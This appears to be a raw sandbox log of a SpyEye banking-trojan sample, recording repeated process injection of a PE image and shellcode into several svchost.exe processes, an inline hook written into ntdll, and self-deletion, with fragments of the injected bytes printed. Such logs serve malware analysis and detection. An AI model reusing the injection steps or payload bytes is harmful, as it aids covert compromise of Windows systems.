Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2019260127
Thread delayed Time: 0 TID: 4214 success or wait 2019261989
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 2019334255
Thread delayed Time: 1 TID: 9266 success or wait 2019353859
Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2019914781
Memory allocated PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: EB0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2019915508
System info queried Type: BasicInformation success or wait 2019916349
System info queried Type: ProcessorInformation success or wait 2019918938
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019925766
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019945203
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019956181
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019957894
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019958324
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019958985
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019962617
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019962997
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019964254
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019965772
System info queried Type: BasicInformation success or wait 2019968456
System info queried Type: ProcessorInformation success or wait 2019984256
Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: EB0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2020033456
Memory attributes changed PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2020034794
Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 5A 84 success or wait 2020059338
Memory allocated PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2020066407
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2020067099
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2020084125
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2020085038
Memory written PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2021388367
Thread delayed Time: 0 TID: 4214 success or wait 2021389874
Memory written PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2021419814
Memory allocated PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: AF0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2021420333
System info queried Type: BasicInformation success or wait 2021420883
System info queried Type: ProcessorInformation success or wait 2021420994
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2021421372
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2021427159
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2021427260
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2021431745
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2021431838
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2021432368
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2021433094
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2021433191
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2021434027
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2021434150
System info queried Type: BasicInformation success or wait 2021435268
System info queried Type: ProcessorInformation success or wait 2021435376
Memory written PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: AF0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2021463445
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2021470039
Memory written PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 1E 84 success or wait 2021492108
Memory allocated PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2021492833
Memory attributes changed PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2021492946
Memory attributes changed PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2021493067
Memory attributes changed PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2021493177
Memory written PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2029171502
Thread delayed Time: 0 TID: 4214 success or wait 2029171972
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe success or wait 2029172778
Thread delayed Time: 1 TID: 9266 success or wait 2029173914
Memory written PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2029201118
Memory allocated PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: 1A80000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2029201233
System info queried Type: BasicInformation success or wait 2029201352
System info queried Type: ProcessorInformation success or wait 2029201451
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2029201601
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2029201909
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2029201996
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2029202215
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2029202305
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2029202413
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2029202621
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2029202709
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2029202892
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2029203009
System info queried Type: BasicInformation success or wait 2029203303
System info queried Type: ProcessorInformation success or wait 2029203404
Memory written PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: 1A80000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2029228936
Memory attributes changed PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2029229065
Memory written PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 17 85 success or wait 2029252853
Memory allocated PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2029253338
Memory attributes changed PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2029253452
Memory attributes changed PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2029253573
Memory attributes changed PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2029253682
Memory written PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2030258558
Memory written PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2030280542
Thread delayed Time: 0 TID: 4214 success or wait 2030280901
Memory allocated PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: 890000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2031061074
System info queried Type: BasicInformation success or wait 2031063534
System info queried Type: ProcessorInformation success or wait 2031065525
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031067336
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031104461
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031121401
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031126666
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031145423
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031151620
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031191498
Thread delayed Time: 0 TID: 4214 success or wait 2031392773
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031549777
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031552664
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031552990
System info queried Type: BasicInformation success or wait 2031576528
System info queried Type: ProcessorInformation success or wait 2031576820
Memory written PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: 890000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2031645609
Memory attributes changed PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031646643
Memory written PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 F8 83 success or wait 2031704567
Memory allocated PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2031729483
Memory attributes changed PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031731766
Memory attributes changed PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031733061
Memory attributes changed PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031749320
Memory written PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2033439134
Thread delayed Time: 0 TID: 4214 success or wait 2033442802
Memory written PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2033511940
Memory allocated PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: 990000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2033543172
System info queried Type: BasicInformation success or wait 2033545673
System info queried Type: ProcessorInformation success or wait 2033546581
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2033547517
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2033550107
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2033558819
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2033560750
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2033562025
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2033562328
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2033562926
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2033563426
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2033567996
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1F70000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2033569111
System info queried Type: BasicInformation success or wait 2033572473
System info queried Type: ProcessorInformation success or wait 2033573072
